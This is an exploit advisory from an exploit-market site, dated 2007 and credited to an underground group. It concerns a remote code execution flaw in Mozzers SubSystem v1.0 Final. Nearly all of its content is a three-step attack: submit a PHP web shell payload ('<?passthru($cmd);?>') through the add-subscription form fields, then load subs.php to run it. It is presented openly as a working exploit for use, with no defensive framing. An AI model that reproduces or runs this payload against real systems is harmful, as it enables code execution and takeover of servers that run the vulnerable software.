[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1776
Category
web applications
Date add
17-04-2007
Platform
unsorted
======================================================================
Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability
======================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  Mozzers SubSystem v1.0 Final                                                             +
+          Type........:  Remote Code Execution Vulnerability                                                      +
+          Download....:  http://sourceforge.net/projects/subsystem/                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Bug.........:                                                                                           +
+                         (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add                   +
+                         (2) Insert Bad Code Into (Sub-name) Or (Sub-url)  E.g  :<?passthru($cmd);?>              +
+                         (3) See Your Bad Code      : http://[Target]/[Path]/subs.php                             +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



#  0day.today [2024-12-24]  #